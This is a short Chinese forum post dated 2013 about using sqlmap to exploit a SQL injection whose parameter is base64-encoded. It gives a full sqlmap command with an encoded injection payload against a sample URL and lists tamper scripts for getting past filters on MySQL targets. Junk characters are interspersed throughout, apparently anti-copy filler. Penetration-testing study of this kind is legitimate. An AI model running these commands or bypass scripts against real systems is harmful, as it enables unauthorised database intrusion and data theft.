WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?# s" B7 S- S+ U
5 g- E% [, t( c: Z6 Q1 H5 `
sqlmap的tamper里有个base64encode.py8 ^6 s4 `) [4 P/ n" ^0 {
" Y1 d8 [' s! v2 R1 T- }
使用如下* _4 ~( R/ E- t4 k
5 C' `% K0 Q- K% B- C B2 n) P
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
$ k5 K7 E2 S, n& l" O8 j- R
; o: }/ Z- d. H8 i# t# v
3 P' j9 ?. g+ ?* `! Q" e. Nsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
# b1 R( E! V% O# x' y2 ?1 y
5 |+ J% U2 m. I其中常用到的bypass脚本绕过SQLMAP主要两个脚本:5 B9 t3 l2 B1 G
6 Q1 l6 y/ N5 k6 u2 S% q4 cspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入* K7 T& Z% O9 _9 q
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
& O" k E- t- B首先确定目标数据库版本,然后选择相应的脚本。7 b) N. t8 v2 ~) A; }
-v 3 --batch --tamper "space2hash.py"& A5 p0 n, p" X' {. k. A! y
) D' a5 X# p: v0 n5 w还有其他一些插件:
! m' G! u! F$ fencodes编码 ——charencode.py' ^# [, B1 _( v; s; r1 w) k: M
base64编码 —— base64encode.py% s- `3 P7 l! u. d2 F; H
替换空格和关键字 —— halfversionedmorekeywords.py
' @3 ^; K; Y) ~& ?& M2 X |
* |1 o% ^9 G1 z9 p3 ]: R
2 {/ i5 c* N: F
5 S1 w& z. f2 J4 @) F
" P2 b: j" v% E, U |
发表于 2013-11-23 15:50:45
收藏
支持
反对